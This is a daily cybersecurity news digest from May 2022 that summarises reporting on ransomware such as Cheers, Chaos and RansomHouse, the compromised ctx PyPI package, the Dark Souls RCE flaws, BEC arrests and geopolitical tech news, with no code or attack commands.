Thursday, May 26, 2022 // (IG): BB //Weekly Sponsor: UNDERWORLD BJJ
New ‘Cheers’ Linux ransomware targets VMware ESXi servers
FROM THE MEDIA: A new ransomware named ‘Cheers’ has appeared in the cybercrime space and has started its operations by targeting vulnerable VMware ESXi servers. VMware ESXi is a virtualization platform commonly used by large organizations worldwide, so encrypting them typically causes severe disruption to a business’ operations.
We have seen many ransomware groups targeting the VMware ESXi platform in the past, with the most recent additions being LockBit and Hive. The addition of Cheers ransomware to the club was discovered by analysts at Trend Micro, who call the new variant ‘Cheerscrypt’.
READ THE STORY: Bleeping Computer
Sanctions Frustrating Russian Ransomware Actors
FROM THE MEDIA: Russia's invasion of Ukraine appears to be having an unanticipated impact in cyberspace — a decrease in the number of ransomware attacks. "We have seen a recent decline since the Ukrainian invasion," Rob Joyce, the U.S. National Security Agency's director of cybersecurity, told a virtual forum Wednesday.
Joyce said one reason for the decrease in ransomware attacks since the February 24 invasion is likely improved awareness and defensive measures by U.S. businesses. He also said some of it is tied to measures the United States and its Western allies have taken against Moscow in response to the war in Ukraine.
READ THE STORY: VOA
Interpol's Massive 'Operation Delilah' Nabs BEC Bigwig
FROM THE MEDIA: Business email compromise (BEC) attacks have caused billions of dollars in losses to businesses globally in recent years — but now international law-enforcement has notched up another victory in the battle against them.
Interpol on Wednesday announced that "Operation Delilah" has resulted in Nigerian police arresting the suspected head of SilverTerrier, aka TMT, which is a massive BEC operation that has been active since at least 2015, impacting thousands of businesses and individuals across four continents. The 37-year-old Nigerian man, who the Interpol did not name, was apprehended at the Murtala Muhammed International Airport in Lagos as he attempted to re-enter the country after fleeing ahead of the police in 2021.
READ THE STORY: Darkreading
Geopolitical conflicts spill into cyberspace, state-backed threat actors target critical infrastructure: Akshat Jain, CTO & Co-founder, Cyware
FROM THE MEDIA: Geopolitical conflicts in the real world are now spilling into cyberspace as state-backed threat actors target critical infrastructure entities to cause disruption or for espionage purposes. Many public and private sector organizations are getting caught in the crossfire of such cyberwars, leading to loss of data, service outages, reputational damage, financial theft, and more. Nation-state actors come with immense technical skills and resources at their disposal and they actively share attack vectors, malware, hacking tools, and their tactics, techniques, and procedures (TTPs) with other groups to make their attacks more effective. On the other hand, organizations are often left to defend alone against such capable adversaries. Therefore, security teams need to factor in the potential threats originating from nation-state actors and shape their strategies, accordingly.
READ THE STORY: Express Computer
Widely used Python and PHP libraries compromised
FROM THE MEDIA: In a software supply chain attack, PyPI module ctx has been compromised. By this attack, the safer version of this module (which is downloaded 20,000 times a week) was replaced with code that exfiltrates the developer’s environment variables to collect secret codes like Amazon AWS keys.
‘Ctx’ is a minimal Python module that lets developers manipulate dictionary ‘dict’ objects in a number of ways. Interestingly, after remaining untouched for 8 years, newer versions started emerging on May 15 and contained malicious code. PyPI took down the malicious ctx versions soon, however, reports still indicate the presence of malicious code within all ctx versions.
READ THE STORY: Analytics India Mag
What We Know About the Vulnerabilities Keeping ‘Dark Souls’ Offline
FROM THE MEDIA: The maker of Dark Souls, a popular video games series, has shut down its servers for over 113 days due to CVE-2022-24126, a remote code execution (RCE) vulnerability that could allow a hacker to take over a user’s PC and put its active player base at risk.
On May 10, the game’s publisher, Bandai Namco, said that developers from FromSoftware, the Japanese firm that created the series, were “actively working on resolving the issue in question” and that servers would be running “as soon as possible.” As of this publishing, every game in the Dark Souls series (Dark Souls 3, Dark Souls 2, Dark Souls: Remastered, and Dark Souls: Prepare to Die Edition) remain offline.
In its statement, Bandai Namco did not address the specific issue they were fixing, nor did they mention two other active vulnerabilities—namely CVE-2022-24125 and CVE-2021-34170—that have been confirmed to be affecting those games in addition to CVE-2022-24126.
READ THE STORY: Security Boulevard
Russian hackers behind new Brexit leak website, says Google
FROM THE MEDIA: The website has published multiple emails that it claims were sent to and from key people in the Brexit process, including former MI6 chief Richard Dearlove, leading Brexit supporter Gisela Stuart, and pro-Brexit historian Richard Toombs. The website, 'Very English Coop [sic] d'Etat', sclaim that the hacked messages demonstrate that a group of hardline pro-Brexit figures is secretly controlling the UK.
It further claims a 'deep state' plot to replace Theresa May with Boris Johnson as Prime Minister. Two victims of the leak confirmed to Reuters they been targeted by hackers, and blamed the Russian government.
READ THE STORY: Computing
Chaos ransomware explained: A rapidly evolving threat
FROM THE MEDIA: The Chaos ransomware builder started out last year as a buggy and unconvincing impersonation of the notorious Ryuk ransomware kit. It has since gone through active development and rapid improvements that have convinced different attacker groups to adopt it. The latest version, dubbed Yashma, was first observed in the wild in mid-May and contains several enhancements.
One successful ransomware operation known as Onyx hit U.S.-based emergency services, medical facilities and organizations from several other industries over the past year. It uses a variation of the Chaos ransomware, according to security researchers.
READ THE STORY: CSO Online
Feds remain in the dark as ransomware disclosure lags
FROM THE MEDIA: Peters in July 2021 launched an investigation into the role cryptocurrencies play in ransomware. The probe was announced after a series of devastating ransomware attacks on key industries, including the May 2021 attack on Colonial Pipeline, followed weeks later by a ransomware attack on meat supplier JBS USA and the July ransomware attack against IT monitoring firm Kaseya.
The attacks demonstrated the potential impacts of such malign activity on national security, giving rise to a series of Biden administration measures to crack down on ransomware.
The Department of Justice formed of a task force last year to help coordinate investigations into criminal ransomware, leading to increased cooperation with international law enforcement partners. It also took additional measures to recover ransom payments, shut down the infrastructure of criminal gangs and shut down crypto transfer companies and money laundering operations.
READ THE STORY: Cyber Security Dive
SpiceJet's brush with ransomware is a timely reminder to protect yourself against this cyber menace
FROM THE MEDIA: SpiceJet said on Wednesday it thwarted a ransomware attack attempt, which hobbled the airline's systems and delayed multiple flights by several hours. While the fallout was, at worst, frayed passenger tempers and tangled logistics, the incident has shifted the spotlight to the menace of ransomware attacks, which gained prominence in 2017.
READ THE STORY: CNBC TV 18
Chinese takeover of UK's largest microchip producer faces national security review
FROM THE MEDIA: The acquisition of the UK's biggest microchip factory, Newport Wafer Fab, by a Chinese-owned technology company is to undergo a national security assessment. The business secretary Kwasi Kwarteng announced the move after Nexperia, which is headquartered in the Netherlands but part of Shanghai-based Wingtech, completed the purchase in July last year for a reported £63m.
Mr Kwarteng wrote on his Twitter account: "There will now be a full assessment under the new National Security and Investment Act. "We welcome overseas investment, but it must not threaten Britain's national security."
READ THE STORY: Sky News
Defining the borders of data
FROM THE MEDIA: The New York Times takes a look at the evolving world of data privacy regulation. The data users share when on the web has gone relatively unregulated for years, and Big Tech has enjoyed the freedom of using that data as they see fit. Now nations all over the world are attempting to reign in that unchecked power by establishing “digital sovereignty,” regulations that limit how, when, and why tech companies can access data originating within the country’s borders. But it’s a race against time, as the world becomes more digitized and the pile of available data continues to grow at an exponential rate.
Cloud computing further complicates matters, allowing a company in one country to store their data on a server in another. Federico Fabbrini, a professor of European law at Dublin City University, explains, “The amount of data has become so big over the last decade that it has created pressure to bring it under sovereign control.”
READ THE STORY: The Cyberwire
Head of DOD artificial intelligence command warns Pentagon must improve to beat China on AI
FROM THE MEDIA: The U.S. military’s top expert on artificial intelligence (AI) said Wednesday that the Pentagon must up its game to ensure American supremacy in a future era where artificial intelligence will determine success on the battlefield.
China aims to dominate the world in the AI space by 2030, the Pentagon’s Joint Artificial Intelligence Director Lt. Gen. Michael Groen told an Atlantic Council-convened audience gathered for a discussion of AI in national security. Groen said that AI will be a $16 trillion industry by 2030, and will raise GDP significantly for both China and the U.S.
READ THE STORY: Cyberscoop
RansomHouse may be operated by frustrated bounty hunters.
FROM THE MEDIA: RansomHouse, a new extortion gang, skips the data encryption customary with conventional ransomware operators and extorts victims by data theft and the threat of doxing, Researchers at Cyberint who've been tracking the group note that it claims an elevated purpose.
RansomHouse objects to the way organizations don't devote enough resources to security, and hopes to shove them in the direction of better practices. RansomHouse also objects to what it views as a cheapskate tendency with respect to bug bounties, and this suggests to Cyberint that the members of the gang may be frustrated bounty hunters, white hats gone bad.
READ THE STORY: The Cyberwire
China to develop anti-Starlink satellite weapon to protect national security
FROM THE MEDIA: The Chinese military is planning to develop a weapon that can destroy Elon Musk’s Starlink satellites, if it threatens their “national security”, media reports said. Starlink is a satellite constellation system operated by Musk’s Spacex, and provides broadband internet services to commercial and military users around the globe. With more than 2,300 satellites in orbit, it is generally believed to be indestructible because the system can maintain proper functioning after losing some satellites.
READ THE STORY: Orissa Post
Verizon DBIR: Stolen credentials led to nearly 50% of attacks
FROM THE MEDIA: The Verizon 2022 Data Breach Investigations Report revealed that an alarming percentage of attacks last year were caused by threat actors using a very simple tool: stolen credentials.
While a rise in ransomware was the spotlight of the 15th annual report, enterprises also struggled with securing credentials and exposed web applications, as well as patching vulnerabilities and properly configuring security controls. Those common mistakes led to big consequences.
One commonality among the more than 20,000 security incidents and 5,212 confirmed data breaches was the use of stolen credentials, which accounted for nearly 50% of attacks and was present in third-party breaches, phishing attacks, basic web application attacks (BWAA) and system intrusions.
READ THE STORY: TechTarget
The Best Counter to Misinformation is More Information
FROM THE MEDIA: As war spread across Ukraine earlier this year, Russia and its allies were spinning tales and stretching the truth to support a clearly unlawful use of force. First it was a claim that Ukraine was committing genocide against ethnic Russians in contested regions. Next was a claim that neo-Nazis in Ukraine posed an immediate threat to Russia, as a pretense for an unlawful invasion, or a false defense offered by the aggressors is that Ukraine was developing nuclear or biological weapons. Meanwhile, Russian censors went into overdrive back home, and the government even passed a law threatening anyone who calls the “Ukraine issue” a war with 15 years in prison. Information has now become a strategic weapon, even in conventional wars.
READ THE STORY: Small wars Journal
UN to vote in ‘coming days’ on North Korea sanctions
FROM THE MEDIA: The UN Security Council will vote in the “coming days” on a US-led push to strengthen sanctions on North Korea for its renewed ballistic missile launches, a US official said on Wednesday, although China and Russia have signaled opposition. North Korea fired three missiles on Wednesday, including one thought to be its largest intercontinental ballistic missile, after US President Joe Biden ended a trip to Asia. It was the latest in a string of missile launches by North Korea this year.
The United States began a push at the end of March on sanctions and then last month circulated a draft resolution to the 15-member body. A resolution needs nine “yes” votes and no vetoes by Russia, China, France, Britain or the United States to pass.
READ THE STORY: SABC NEWS
Kiev condemns Russia's fast-track passport issuance decree for Ukrainian citizens
FROM THE MEDIA: The Ukrainian Foreign Ministry has condemned the decree signed by Russian President Vladimir Putin, which allows residents of Ukraine's southern Zaporizhzhia and Kherson regions to apply for Russian citizenship under a fast-track procedure. "The decree of the President of Russia is legally null and void and will have no legal consequences," the ministry was quoted by Xinhua news agency as saying.
The issuance of Russian passports to Ukrainian citizens living in the territories seized by Russia is a "gross violation of Ukraine's sovereignty and territorial integrity, norms and principles of international humanitarian law," it said. Putin signed the decree on the simplified passport issuance procedure for the residents of the Zaporizhzhia and Kherson regions earlier in the day.
READ THE STORY: National Herald India
NATO Deputy Secretary General opens “Defense Disrupted” innovation and technology conference
FROM THE MEDIA: Deputy Secretary General Mircea Geoană opened the “Defence Disrupted 2022” conference on Thursday (26 May 2022), stressing the importance of maintaining NATO’s technological edge, and remaining at the forefront of defence innovation. In a video address to participants gathered in London, he reflected on how innovation and technology have always been central to NATO’s mission of preventing war.
READ THE STORY: NATO
Items of interest
Cyber Threats to Health, Education Sectors Increase with Ransomware, Limited Security Resources
FROM THE MEDIA: The healthcare sector and supporting critical infrastructure sectors “can no longer look at the challenges through just a cyber and/or physical lens but must consider all threats to operational resilience,” while the education sector suffers from equity issues reflected in reduced cyber protection capabilities in under-funded K-12 districts and colleges, experts told lawmakers.
“With the rise in digital health care, the proliferation of advances in technology and the efficiencies of connecting devices and data, the cyber threat surface in health care has ballooned and the threat actors have followed,” Health Information Sharing and Analysis Center (H-ISAC) President and CEO Denise Anderson, also representing the Health Sector Coordinating Council Cybersecurity Working Group, said at the hearing of the Senate Health, Education, Labor and Pensions Committee on May 18 to examine cyber threats to the healthcare and education sectors. “The focus has traditionally been on data and privacy, but if providers cannot deliver services or data is manipulated or destroyed patient lives can be at risk.”
READ THE STORY: HSTODAY
Cyber Crime Isn't About Computers: It's About Behavior (Video)
FROM THE MEDIA: Having a computer hacked can be life altering! We are often fearful of hackers and those who want to engage in identity theft. Well this ex-NSA agent and IT specialist will explain how hacking can be prevented!
Brett Johnson: US Most Wanted Cybercriminal (Video)
FROM THE MEDIA: Brett Johnson was a US Most Wanted cybercriminal, called the Original Internet Godfather by US Secret Service for building the first organized cybercrime community called ShadowCrew, which was the precursor to today's darknet and darknet markets.
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com